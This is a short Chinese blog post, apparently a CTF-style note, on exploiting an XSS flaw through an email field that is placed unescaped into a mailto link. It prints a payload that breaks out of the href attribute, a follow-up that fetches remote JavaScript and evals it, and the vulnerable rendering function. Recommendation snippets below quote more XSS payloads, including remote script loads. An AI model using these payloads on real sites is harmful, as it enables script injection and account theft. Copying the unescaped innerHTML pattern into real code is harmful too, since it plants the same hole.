利用mailto的xss payload

最新推荐文章于 2025-08-23 16:25:10 发布
最新推荐文章于 2025-08-23 16:25:10 发布
阅读量801 收藏 1
点赞数 7
CC 4.0 BY-SA版权
文章标签: xss 前端 javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zxj993853579/article/details/139994749 
<bar"onclick="alert('XSS')"@foo>

以上面的代码作为email,会构造出

<a class="post-author" href="mailto:<bar" onclick="alert('XSS')" @foo="">"&gt;1</a>

 点击邮箱弹出

简单利用:

<a"onclick="fetch('http://127.0.0.1/1').then(r=>r.text()).then(eval);"@b>

源码: 

function renderPost(postData){

    var postStructure = `
    <header class="post-header">
        <h2 class="post-title"></h2>
        <p class="post-meta">
            By <a class="post-author" href="mailto:${postData.author_email}">${postData.author_name}</a> on <span class="post-date">${(new Date(postData.timestamp)).toLocaleString()}</span>
        </p>
    </header>
    <div class="post-body"><p></p></div>`;
    var post = document.createElement('SECTION');
    post.id = `post-${postData.post_id}`;
    post.className = "post";
    post.innerHTML = postStructure;

    post.querySelector('h2.post-title').innerText = postData.title;
    post.querySelector('div.post-body p').innerHTML = postData.content;

    return(post);

}

J14NNN
关注
payload的使 常用xss_XSS Payload深入分析整理
weixin_39567870的博客
12-20 691
几种加载XSS Payload的不常见标签众所周知,一种调用JavaScript的方法就是在元素类型上使用事件处理器(Event Handler),通常的一种方法类似:这是一种使用无效src属性来触发 onerror 事件处理器(onerror event handler)的方法,当然,其中包含了一个alert跳出框的xss payload,如下alert(1):由于过度使用img标签和onerr...
XSS Payload深入分析
mikebarton的博客
11-21 406
众所周知,一种调用JavaScript的方法就是在元素类型上使用事件处理器(Event Handler),通常的一种方法类似: <img src=x onerror=alert(‘xss’) /> 这是一种使用无效src属性来触发 onerror 事件处理器(onerror event handler)的方法,当然,其中包含了一个alert跳出框的xss payload,如下al...
XSS靶场通关详解(1-18关)
cz020907020808的博客
06-07 2574
家人们,因为xss靶场比较简单,有些地方说的比较笼统,过关很容易,只需要多尝试就可以,但是学好就难了!
跨站点脚本攻击(XSS)防护 XSS HTMLFilter
热门推荐
jasontome的android之路:Do it. Do it right. Do it righ
01-26 1万+
XSS HTMLFilter这是一个采用Java实现的开源类库。用于分析用户提交的输入,消除潜在的跨站点脚本攻击(XSS),恶意的HTML,或简单的HTML格式错误。 示例代码: // retrieve input from user... String input = ... String clean = new HTMLInputFilter().filter( input );
XSS攻击之HTTP代码注入
thislocal的博客
03-30 6778
HTML代码一般由标签名、属性名、属性值、文本、注释等组成。我们进行代码注入攻击,就是在这几个地方进行。 一、标签绕过 1、对标签名进行大小写混合,并不影响代码执行,有时却可以绕过过滤器。如: 2、利用现代浏览器对XHTML的支持,可以在某些浏览器的某些版本插入XML代码、SVG代码或未知标签。如: 等。3、分析过滤器缺陷,进行针对性绕过。分析过滤器缺陷需要长期的积累。4、利用注释
payload的使 常用xss_XSS Payload知识备忘
weixin_39966465的博客
12-20 424
参考资料:《白帽子讲Web安全》吴翰清 著参见:本文地址:博客园http://www.cnblogs.com/go2bed/p/4136358.html含义:XSS 攻击成功后,攻击者能够对用户当前浏览的页面植入恶意脚本,通过恶意脚本,控制用户的浏览器。这些用以完成各种具体功能的恶意脚本,被称为“XSS PayLoad”。用法:Cookie 劫持攻击攻击者先加载一个远程脚本:http://www...
28、XSS常见payload
Web安全工具库
01-02 6046
环境:http://xss-quiz.int21h.jp 一、Stage #1 无过滤xss漏洞 1、随便输入字符:123 2、输入payload: 3、弹出对话框,说明存在xss漏洞 二、Stage #2 属性中的xss漏洞 1、在窗口中输入payload:,查看审查元素,payload被写在一个标签中 2、重新构造payload,先闭合标签: "> 或者 "οnmοuseοve...
web安全入门学习笔记9——XSS Payload 深度解析:原理、攻击与防御
sinat_36670976的博客
07-23 1154
​​预防​​:输入验证 + 输出编码 + CSP策略​​检测​​:自动化扫描 + 人工审查​​响应​​:及时修复漏洞 + 安全通告​​恢复​​:清除恶意代码 + 撤销泄露凭证​​改进​​:根因分析 + 流程优化​​终极防线​所有用户输入皆不可信所有输出必须按上下文编码实施最严格的内容安全策略保持框架和安全库更新定期进行安全审计和渗透测试。
XSS payload
Shanfenglan's blog
04-06 296
(1)普通的XSS JavaScript注入 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (2)IMG标签XSS使用JavaScript命令 <IMG SRC=javascript:alert(‘XSS’)> (3)IMG标签无分号无引号 <IMG SRC=javascript:alert(‘XSS’)> (4)IMG标签大小写不敏感 <IMG SRC=JaVaScRiPt:alert(‘XSS’)
xss payload.pdf
10-27
PortSwigger研究中心发布的XSS payload cheat sheet(XSS攻击载荷速查表)列举了多种攻击载荷向量,这些向量可以帮助攻击者绕过Web应用防火墙(WAF)和过滤器。这些向量按照事件类型、标签或浏览器进行分类,并为每...
XSS payload大全
01-22
在本篇文章中,详细列出了各种XSS攻击的payload(有效载荷),这些payload可以被直接使用来实施跨站脚本攻击。下面我将详细介绍这些payload的含义、使用场景和潜在的危害。 1. **基础概念** - **payload**:在XSS...
xss payload构造方法
weixin_48734687的博客
10-01 2720
对照教程闯了几关总结一下各种绕过方式 url传参注入 未对参数进行任何过滤的 payload: <script>alert()</script> <img src=1 onerror=alert()> payload被引号包裹的 例如:<input name=keyword value="<script>alert()</script>">
前端安全防护手册:对抗XSS、CSRF、点击劫持等攻击
分享前端技术,也聊聊工程师的成长与生活。
08-22 720
前端安全没有一劳永逸的解决方案。一个未转义的变量、一个随意拼接的URL、一个遗漏的CSP头,都可能成为整个系统的突破口。防御的关键在于分层实施:从代码层面(输入过滤、输出编码),到传输层面(HTTPS),再到架构层面(CSP、Token验证),每一层都增加攻击者的成本。定期使用OWASP ZAP或Burp Suite进行渗透测试,建立漏洞响应流程,将安全实践融入开发全生命周期。唯有将“安全第一”转化为开发习惯,才能守住用户数据的最后一道防线。
CSP与XSS
weixin_43751677的博客
08-19 671
现代XSS攻击面临多重挑战:传统攻击方式如<script>alert(1)</script>已被现代浏览器安全机制(如CSP、混合内容策略、CORS等)有效限制。本文探讨了实际利用XSS时的常见障碍及解决方案:1) innerHTML属性不执行<script>标签,需改用SVG/IMG标签;2) DOM加载时机问题可通过监听DOMContentLoaded事件解决;3) 严格CSP下需寻找二次漏洞链(如文件上传)绕过限制;4) HTTPS环境下需配置合法TLS证书避免混合
前端安全之XSS和CSRF
最新发布
ScottePerk的博客
08-23 235
本文介绍了前端开发中两种常见的安全问题:XSS和CSRF。XSS攻击通过注入恶意代码篡改网页内容,防范措施包括使用Vue框架的防转义语法、避免v-html标签、采用DomPurify库等。CSRF攻击利用Cookie信息伪造用户请求,可通过CSRF token、SameSite Cookie属性、二次验证等方式防范。文章强调,虽然Cookie存在安全风险,但通过合理设置仍可安全使用,同时指出localStorage也存在XSS风险。建议开发者根据实际需求选择合适的安全方案,特别在金融等敏感领域更需重视这些安
防御XSS与CSRF攻击
dd的博客
08-22 822
XSS(Cross-Site Scripting,跨站脚本)攻击是一种注入类型的攻击,攻击者通过在目标网站上注入恶意脚本代码,当用户浏览该页面时,恶意代码会在用户的浏览器上执行,从而窃取用户数据、会话令牌或重定向用户到其他网站。CSRF(Cross-Site Request Forgery,跨站请求伪造)是一种攻击方式,攻击者诱导已登录用户访问包含恶意请求的网站,利用用户的身份在用户不知情的情况下执行未授权的操作。对于AJAX请求,添加自定义请求头,利用CORS机制阻止跨站请求。// 前端AJAX请求。
css的white-space: pre
qq_51035159的博客
08-22 248
简单来说,这个组件的核心就是让用户能够粘贴任何文本内容(特别是配置文件、JSON等),并且保证粘贴的内容格式完全不变,然后可以原样发送给后端处理。- white-space: pre :这是最关键的CSS属性,确保所有空格、制表符、换行符都被保留。- 用户粘贴的内容会完整存储在 inputJson.value 中,包括所有格式字符。- 使用Vue3的 v-model="inputJson" 实现双向数据绑定。- wrap="off" :防止浏览器自动换行,保持原始的行结构。- 聚焦时的视觉反馈。
Vue 自定义指令
前端小巷子的博客
08-20 520
在 Vue 中,组件负责“可见”的 UI,自定义指令则负责“不可见”的底层 DOM 行为。当你需要直接操作节点、监听第三方库、或封装浏览器原生 API 时,指令往往比组件更轻量、更灵活。Vue 为自定义指令设计了五条钩子函数,覆盖从首次绑定到最终解绑的完整生存周期。
前端AI工具——TRAE
2301_80841939的博客
08-22 407
Trae 是一款直接与 Cursor 形成竞争的、由中国团队开发的AI编程助手。它同样采用基于Visual Studio Code核心的编辑器,深度集成了AI功能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值